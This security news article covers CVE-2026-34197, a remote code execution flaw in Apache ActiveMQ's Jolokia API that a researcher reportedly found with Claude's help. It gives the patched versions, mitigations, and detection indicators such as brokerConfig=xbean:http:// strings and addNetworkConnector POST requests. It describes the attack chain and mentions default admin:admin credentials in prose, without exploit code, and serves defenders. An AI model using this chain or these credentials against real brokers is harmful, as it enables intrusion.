13-Year-Old ActiveMQ Bug Found by Claude AI Enables RCE

A critical remote code execution vulnerability in Apache ActiveMQ sat undetected for over a decade until a security researcher used Anthropic's Claude AI to find it in under 10 minutes. CVE-2026-34197 allows attackers to execute arbitrary commands on affected message brokers through the Jolokia management API.

Apache patched the flaw on March 30, 2026, releasing fixed versions 5.19.4 and 6.2.3. Organizations running older versions should treat this as a high priority—ActiveMQ has been repeatedly targeted in real-world attacks, with two prior CVEs already on CISA's Known Exploited Vulnerabilities catalog.

TL;DR

• What happened: 13-year-old RCE vulnerability discovered in Apache ActiveMQ's Jolokia API
• Who's affected: ActiveMQ Classic before 5.19.4, versions 6.0.0 through 6.2.2
• Severity: CVSS 8.8 (High), but unauthenticated on versions 6.0.0-6.1.1
• Action required: Upgrade to ActiveMQ 5.19.4 or 6.2.3 immediately

How the Attack Works

The vulnerability exploits a chain of legitimate features in ActiveMQ's architecture. Horizon3's research details the attack mechanism:

1. Jolokia API access: ActiveMQ's web management console (port 8161) exposes JMX operations via REST at /api/jolokia/
2. MBean operation abuse: Post-2023 security patches permit operations on ActiveMQ MBeans, including addNetworkConnector()
3. VM transport with remote config: The vm:// transport can load Spring XML configurations from attacker-controlled URLs

An attacker calls addNetworkConnector() with a crafted URI containing a brokerConfig parameter pointing to a malicious Spring configuration file. When processed, ActiveMQ's VM transport layer creates an embedded broker that loads and executes the attacker's payload.

The attack requires authentication on most versions—but default credentials remain admin:admin in many deployments. Message broker infrastructure shares the same default credentials problem that plagues similar systems like Eclipse OpenMQ.

Unauthenticated RCE on Version 6.x

The severity escalates dramatically for ActiveMQ 6.0.0 through 6.1.1. These versions shipped with CVE-2024-32114, which exposes the Jolokia API without authentication. Combined with CVE-2026-34197, attackers can achieve unauthenticated remote code execution—no credentials required.

Organizations running 6.x branches should verify their version immediately. The jump from authenticated to unauthenticated exploitation changes this from a concerning vulnerability to a critical one.

AI-Assisted Vulnerability Discovery

Naveen Sunkavally, the Horizon3 researcher who found the flaw, described the discovery process as "80% Claude with 20% gift-wrapping by a human." Using Claude as a research assistant, he identified the vulnerable code path in under 10 minutes.

This marks another milestone for AI-assisted security research. The Apache Struts XXE vulnerability disclosed earlier this year was similarly found by Zast AI, an autonomous security research system. The pattern suggests AI tools are becoming standard equipment in vulnerability hunting.

The discovery is notable because it emerged from the interaction of multiple legitimate features rather than a single coding mistake—exactly the kind of complex interaction that traditional static analysis struggles to identify. As AI tools increasingly surface critical flaws like the CVSS 10.0 RCE in Flowise AI, expect more decade-old bugs to emerge from previously audited codebases.

Detection and Indicators

Organizations should monitor for:

• Suspicious broker connections: Internal VM transport protocol usage with brokerConfig=xbean:http:// parameters
• Jolokia API abuse: POST requests to /api/jolokia/ containing addNetworkConnector in the body
• Outbound HTTP connections: Unexpected outbound requests from the ActiveMQ process to retrieve remote configurations

Warning messages about configuration problems in broker logs may indicate payload execution has already occurred. By that point, the attacker's code has run.

Why This Matters

ActiveMQ has a troubled security history. CVE-2023-46604, a CVSS 10.0 deserialization flaw, was weaponized by ransomware gangs including LockBit within days of disclosure. Groups like Storm-1175 have shown how quickly threat actors weaponize high-value vulnerabilities—often within 24 hours. The prior ActiveMQ flaw remains actively exploited for cryptomining and initial access operations.

Message brokers occupy a privileged position in enterprise architectures. They handle inter-service communication, transaction queues, and event streams. Compromising the broker means compromising the trust layer between applications. Similar to the critical vulnerabilities in Apache Tika that threatened document processing pipelines, a flaw in core infrastructure components creates cascading risk.

Mitigation Steps

1. Patch immediately: Upgrade to ActiveMQ Classic 5.19.4 or 6.2.3
2. Restrict network access: Block external access to port 8161 (web console) and port 61616 (OpenWire protocol)
3. Rotate credentials: Change default admin/admin credentials—this should have been done at installation
4. Network segmentation: Isolate message broker infrastructure from general network access
5. Monitor logs: Watch for the detection indicators described above

ActiveMQ Artemis is not affected by this vulnerability. Organizations considering a migration may find this a compelling reason to evaluate the newer broker.

The patch removes the ability for addNetworkConnector to register vm:// transports via the Jolokia API entirely—a surgical fix that eliminates the attack vector without breaking legitimate functionality.